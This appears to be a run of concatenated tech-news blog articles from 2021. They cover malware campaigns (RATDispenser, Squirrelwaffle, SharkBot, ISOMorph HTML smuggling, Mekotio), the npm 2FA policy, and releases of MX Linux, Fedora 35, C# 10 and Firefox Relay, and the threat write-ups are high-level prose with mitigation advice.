The evasive malware loader dubbed "RATDispenser" by HP Threat Research, is responsible for deploying at least eight different malware variants in 2021.

RATDispenser, as with most JavaScript malware, gains an initial foothold on the system before launching a secondary malware that then establishes control over a compromised device. According to the researchers, RATDispenser is predominantly used as a dropper, meaning the malware is not capable of communicating over a network to deliver malicious payload.

The different malware variants, however, can be purchased or downloaded from underground marketplaces, and the authors of RATDispenser as it seems may be operating a malware-as-a-service business model.

How RATDispenser JavaScript Loader is distributing RATs into the Wild?



RATDispenser infection chain begins with receiving an email containing a malicious attachment, such as a JavaScript file (.js) masquerading as a normal text file, supposedly with information about an order.



The user, however, needs to click on the file for the malware to run. When the malware runs, it decodes itself at runtime and writes a VBScript file on %TEMP% folder using cmd.exe. The cmd.exe process is passed along chained argument, which in parts are written to the new file using the echo function.

The malware families distributed by RATDispenser, includes STRRAT and WSHRAT, accounting for 81% of the samples analyzed. STRRAT is a Java RAT that was first seen in mid-2020, with keylogging and credential stealing capabilities. While WSHRAT, also known as Houdini, is a VBS RAT that appeared in 2013, which also has typical RAT capabilities.

But the most interesting among them is Panda Stealer, a new malware family targeting cryptocurrency wallets. The Panda Stealer was first seen in April 2021. And the least common families are GuLoader and Ratty, with the later an open-source RAT written in Java, and GuLoader is a downloader known for downloading and running various other RATs.

How to Mitigate against RATDispenser JavaScript Loader?



Albeit, JavaScript malware are less common file format than Microsoft Office documents, but in several cases it's more poorly detected.

Organizations should make sure that Network defenders feature is activated, as it can prevent infection by blocking executable email attachment file types from passing through their email gateways, such as JavaScript or VBScript. Also, it can interrupt the execution of the malware by changing the default file handler for JavaScript files, allowing only digitally signed scripts to run, or disabling Windows Script Host (WSH).

RATDispenser JavaScript Loader Distributing Remote Access Trojan

The MX Linux team recently released MX Linux 21 based on Debian 11 “Bullseye” and running Linux Kernel 5.10 LTS, coming as the first stable release of the “Wildflower” series.

Now, MX Linux has announced the release of another edition called MX Linux 21 AHS, where the ‘AHS’ stands for ‘Advanced Hardware Support’ meaning it includes newer graphics stack tailored for modern systems.

MX Linux AHS edition comes with the Xfce desktop environment by default, which guarantees smoother experience, as the Xfce desktop environment already has some significant improvements with the main MX Linux 21 release.

What’s New in MX Linux 21 AHS Edition?



MX Linux 21 AHS comes with Linux Kernel 5.14 and updated open-source graphics stack tailored for modern system.



It includes updated mesa, xorg and vulkan drivers for a graphic stack more inline with newer hardware, also with a few recompiled apps that utilize the later kernel. And MX Linux AHS will receive updates for the graphics stack over time, therefore those that do not need the newer graphics stack, don't have to use AHS.

Additionally, all users of the mainline MX releases can enable the ahs repository through mx-repo-manager to do regular updates, while keeping your 5.10 kernel, albeit you’ll have to get the later mesa, xorg and vulkan drivers.

How to Download and Install MX-21 “AHS” Edition?

.

MX Linux 21 AHS iso is now available for download, either as a direct download or you can choose to get the torrent files.

But note that there is a known issue for older systems, particularly with intel-based graphics, with suspend-to-ram, or at least resuming after suspend. If that feature is important to you and your PC can otherwise use the 5.10 kernel from the main releases, then stick with the main releases.

MX Linux 21 AHS Edition: What’s the Difference?

There is a new malware loader spreading through spam campaigns, dubbed Squirrelwaffle, that sends its malicious emails as replies to already existing email chains, a tactic that lures a victim into trusting the malicious spam.

According to researchers at Trend Micro, Squirrelwaffle is able to pull this off, using a chain of both ProxyLogon and ProxyShell exploits, vulnerabilities which were earlier patched this May on Microsoft Exchange Servers.

The vulnerabilities enable attackers to bypass ACL controls, with elevated privileges on Exchange PowerShell backend, which permits the attacker to perform remote code execution.

How Hackers exploit ProxyLogon and ProxyShell vulnerabilities in Spam Campaigns?



The server-side request forgery (SSRF) vulnerability allow an attacker access by sending a maliciously crafted web request to an Exchange Server which contains an XML payload targeted at the Exchange Web Services (EWS) API endpoint.



This exploit gives an attacker the ability to get users SID and emails, and bypasses authentication using specially crafted cookies which allows an unauthenticated threat actor to execute EWS requests encoded in the XML payload and ultimately perform operations on victims’ mailboxes.

In one of the Trend Micro team's observed intrusions, all users in the affected network received the spam emails which have been sent as legitimate replies to existing email threads. And the emails were written in English even though this spam campaign targeted the Middle East. Albeit, other languages were used for different regions, but most were in English.

Interestingly, the real account names of the victim’s domain were used as recipient and sender, which increases the possibility that a recipient will click the link to open the malicious files.

How to Mitigate against Squirrelwaffle Attack?



Squirrelwaffle campaigns again reiterates the different tactics used by hackers to lure victims into clicking malicious emails and files. And it also shows that emails from trusted contacts may not be enough indicator that thelink or file in the email is safe.

Therefore, it is important to ensure that the released patches for Microsoft Exchange Server vulnerabilities, ProxyShell and ProxyLogon (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) have been applied and Microsoft recommends that users install more recent (May or July) security updates.

Hackers hijack Email Chains for sending Malicious Spam replies

GitHub will be requiring two-factor authentication (2FA) for maintainers of popular NPM packages, following recent exploits involving popular NPM package ua-parser-js found to contain malicious code.

While ua-parser-js is used in apps/websites to discover the device or browser a person is using from User-Agent data, a computer with the software installed could allow a remote attacker to obtain sensitive information. Also, GitHub disclosed a vulnerability that could allow an attacker to publish new versions of any NPM package using an account without a proper authorization.

The new 2FA policy will start with a cohort of top NPM packages in the first quarter of 2022, according to a bulletin published by GitHub on November 15.

Major incidents on the registry where NPM accounts were Compromised by malicious actors



GitHub discovered an issue in the routine maintenance of a public NPM service, which during maintenance on the database of NPM replica, data were generated that could expose the names of private NPM packages.



It allowed consumers of the replica to identify the names of private packages due to records in the public changes feed. The names of packages in the format of @owner/package created before October 20 were all exposed for a period between October 21 to October 29, before work started on a fix and on determining scope of the exposure.

However, the records containing the private package names have been removed from the replicate.npmjs.com service and changes made to prevent the reoccurrence of the issue.

What to do when You have infected package installed or running on your System?



If a PC has an infected package installed or running, it should be considered fully compromised, all information and secret keys stored on that computer should be rotated from a different computer immediately.

GitHub also recommends that the package should be removed, but as total control of the compromised computer may have been given to the threat actors, there isn't any guarantee that removal of the package will remove the malicious software.

GitHub to mandate 2FA for maintainers of top NPM packages

Firefox Relay is a service available at relay.firefox.com, that offers a smart, easy email aliases solution which can preserve the privacy of your email address.

The service was initially rolled out in a beta phase for early adopters, with limited access to features. Now, it is generally available for all users, with the introduction of a premium plan that unlocks all the features.

While an email alias is temporary email address that forwards all received emails to your actual email inbox. It protects your real email address from spammers and helps in managing spam effectively.

How Does Firefox Relay protect against Spammers?



Firefox Relay, as a privacy-first service hides your real email address to help protect your identity from spammers. It will forward your email messages from your alias email addresses to your primary email address and all messages are deleted after they’re delivered to you.



And you get five free email aliases and up to 150 kb attachments for free. Additionally, the ability for labels to be synced across devices allow you to add information such as an account name or description to make it easier for you to know which websites you are using the alias. This new syncing ability, means you’ll be able to see the labels on all your connected devices, including mobile phone.

Firefox Relay is currently available in the following languages, namely: English, German, Chinese, Dutch, French, Greek, Italian, Portuguese, Swedish, Ukrainian, Slovak, Spanish and Welsh.

How to Get Started with Firefox Relay



Firstly, you need to create a Firefox Account, if you don't already have an account, and you’ll need to sign in at relay.firefox.com to generate up to five free random email aliases to use. However, if you need more than five email aliases, you'll have to sign up for the Premium service instead.

The premium service introductory price starts at $0.99 per month and currently available in United States, Canada, United Kingdom, Singapore, Malaysia, and New Zealand; with 0.99 EUR/1.00 CHF in Europe including Austria, Germany, Ireland, Belgium, France, the Netherlands, Spain and Switzerland.

Firefox Relay Email Aliases offer protection against Spammers

The Cleafy TIR team has discovered a new Android banking Trojan, dubbed SharkBot, that can initiate money transfers from compromised devices via Automatic Transfer Systems (ATS) technique bypassing multi-factor authentication mechanisms.

SharkBot, once successfully installed in the victim's device, can obtain sensitive banking data through the abuse of Android Accessibility Services, with such information as credentials, login details, current balance, and also able to perform gestures on the infected device.

The botnet is currently targeting victims in the UK, Italy, and the US, mainly banking applications and cryptocurrency exchanges.

How SharkBot Trojan Steals Personal Banking  Information?



SharkBot can implement overlay attacks to steal personal banking login credentials and credit card information and also with capabilities to intercept legitimate banking communications sent via SMS.



It is also capable of performing Automatic Transfer System (ATS) attacks within the infected device, which is an advanced attack technique that enables attackers to auto-fill form fields in legitimate banking apps and initiate transfers from the compromised devices.

The Trojan has a very low detection rate by anti-virus solutions, even with multiple anti-analysis techniques implemented, including obfuscation routine, and a domain generation algorithm (DGA) for its network communication.

SharkBot also attempts to bypass behavioral detection countermeasures such as biometrics put in place by multiple financial services with the abuse of Android Accessibility Services.

How to Mitigate against SharkBot Banking Trojan?



SharkBot is installed on the users' devices using either the side-loading technique or social engineering schemes.

Therefore, it is advised that organizations should be vigilant of these sort of attacks, and also make sure that file permissions aren't set to the "Everyone" group to limit the exposure to further attacks. And always ensure to check the permissions on running database and confirm the permissions are locked down.

New Generation of Android Trojan bypassing multi-factor authentication

HTML Smuggling is a technique used to drop the first-stage dropper—malware samples that's fast gaining notoriety, and recently employed in the spear-phishing campaign carried out by the Nobelium group.

According to Menlo Security, a malware campaign dubbed ISOMorph, been monitored by the team leverages HTML Smuggling to deliver malicious files to victims’ endpoints by evading security solutions like sandboxes and legacy proxies.

ISOMorph attack is multi-staged and capable of checking and disabling various anti-virus programs running on the endpoint.

How ISOMorph uses HTML Smuggling to deliver Malicious files?



ISOMorph attack uses HTML Smuggling to deliver payload to the endpoint as the browser is one of the weakest links, without security solutions to block the payload. HTML Smuggling delivers malicious files by effectively bypassing network security solutions, including legacy proxies, sandboxes, and firewalls.



Attackers use this technique to construct the malicious payload programmatically on HTML page using JavaScript, as opposed to HTTP request to fetch a resource on a web server. It is neither a bug or a design flaw in the browser technologies; developers use the technique most often to optimize file downloads.

The threat actors behind ISOMorph uses JavaScript code to construct the payload on the browser, by creating an element “a” and setting the HREF to the blob, programmatically clicking it will trigger the download to the endpoint.

However, the user must need to open it to execute the malicious code, once the payload is downloaded to the endpoint.

How to Mitigate against ISOMorph Attack?



HTML smuggling is gaining popularity as attackers can easily get their payloads to the endpoint while bypassing all network security, inspection and analysis tools.

As attackers are increasingly upgrading to get their payloads to the endpoint, using such techniques as HTML Smuggling for their initial access, knowing the initial access methods is critical to a strong response strategy.

ISOMorph Attack leverages HTML Smuggling to deliver malware

Microsoft announced the release of C# 10 as part of .NET 6 and Visual Studio 2022, with the object-oriented, type-safe programming language having capabilities that make code quicker and more expressive.

According to the company, C# produces errors when a value that has not been definitely assigned is used, and C# 10 understands the code better to produce less spurious errors, which improvements means users will see less errors and warnings for null references.

Also, C# 10 adds extended property patterns that make it easier to access nested property values in patterns.

What's New in C# 10 Programming Language?



C# 10 brings improvements to structs, as it introduces features for structs that offer better parity between classes and these new features include field initializers, parameterless constructors, record structs and expressions.



Before the release of C# 10, every struct had an implicit public parameterless constructor which set the fields to default, and it was an error to create a parameterless constructor on a struct. But with C# 10, you can include parameterless struct constructors or the implicit parameterless constructor will be provided to set all fields to their default.

In C# 10, you can also specify an explicit return type on a lambda expression, just like on a method or a local function, and the return type goes right before the parameters. Albeit, lambdas are invoked differently from methods and local functions, as a result attributes don't have any effect when the lambda is invoked.

C# 10 has a number of other improvements across the language, with some of these helping to make C# work in the way you expect.

How to Get Started with C# 10?



C# 10 is part of the .NET 6 software development framework and Visual Studio 2022 IDE, and C# programmers using this IDE experience will benefit from several improvements in this release.

Get started by downloading Visual Studio 2022 on Windows which is now available as a 64-bit application, you can edit, run, and debug the biggest and most complex problems without running out of memory.

What's New in Microsoft’s C# 10 Programming Language?

Fedora 35 stable version was recently released with a few notable improvements, including the addition of Gnome 41 and Linux Kernel 5.14, along with the completion of the transition to PipeWire.

While Fedora is known for implementing the latest desktop environments, this release certainly doesn’t seem to change with the norm. Fedora 35 includes KDE Plasma, Xfce, and other desktop environments, as well as images for ARM devices.

And the different desktop variants of Fedora 35, including Fedora Workstation, Fedora KDE, and the others, will also use BTRFS as the default filesystem.

What's New in Fedora 35?



Fedora 35 inclusion of the recently-released Gnome 41 means that it also adds the new Connections app, and significantly improved software center, with multitasking controls for the Fedora 35 Workstation.



On the downside, Fedora 35 opted for Plasma 5.22, instead of the recently released Plasma 5.23, though a minor upgrade, Plasma 5.22 includes the adaptive transparency feature, with improved system settings.

The new Linux 5.14 kernel is great news for those on ARM-based systems, as Linux 5.14 includes many ARM-specific improvements. And ARM computer users will benefit from many of the other improvements in Linux 5.14, mostly as related to GPUs.

What's more? You also get Flatpak app support out-of-the-box to install software easily, and Fedora Kinoite which is based on rpm-ostree technology, features the KDE Plasma desktop..

How to Get Started with Fedora 35?



If you're a new user and want to try Fedora 35, you can donwload the ISO image from the official page, with the images of all editions and variants available.

And you can also check out the full list of changes for all available features in Fedora 35, which can be found in the changelist or in the official announcement.

What's New in Fedora 35 Release?

Mekotio is an old modular banking Trojan that had targeted Latin American countries, but recently made a comeback with stealthy and evasive techniques.

According to Check Point researchers, over 100 attacks has been detected in recent weeks using the new technique, with the infection starting out and distributed with a phishing email having a link to a zip file or a zip archive as an attachment.

The main characteristics of these banking Trojans, such as Mekotio, is the modular attack that gives the attackers the ability to change just a small part of the whole to avoid detection.

How Mekotio new attack flow is carried out



The infection starts with a phishing email containing a link to a zip attachment, which lures the victim into downloading and extracting the zip content.



If the victim clicks on the zip content, the malicious batch script will be executed, that runs a “PowerShell Download Cradles” which downloads and runs a PowerShell script on the memory.

The PowerShell script checks if the target is located in Latin America and makes sure it is not running in a virtual machine. It then sets up persistence in the victim’s operating system by downloading a secondary zip archive.

Check Point researchers believe that the main cybercrime groups behid the new campaigns are operating from Brazil and that they collaborated with Spanish gangs which were recently arrested to distribute malwares. But the arrest did not stop the main cybercrime groups, rather it only stopped the activity of the Spanish gangs.

How to Mitigate against such Banking Trojan like Mekotio?



As threat actors continue to adopt various evasive techniques to avoid detection, with social engineering tricks that lure victims to give up their online banking data, getting more pervasive. Therefore, the most important advice is for users not to click on links that come from any unknown source.

And also beware of lookalike domains, spelling errors in emails or site address, and unfamiliar email senders, especially if they prompt for certain actions that are unusual.

Mekotio Banking Trojan Returns with Stealthy and Evasive Techniques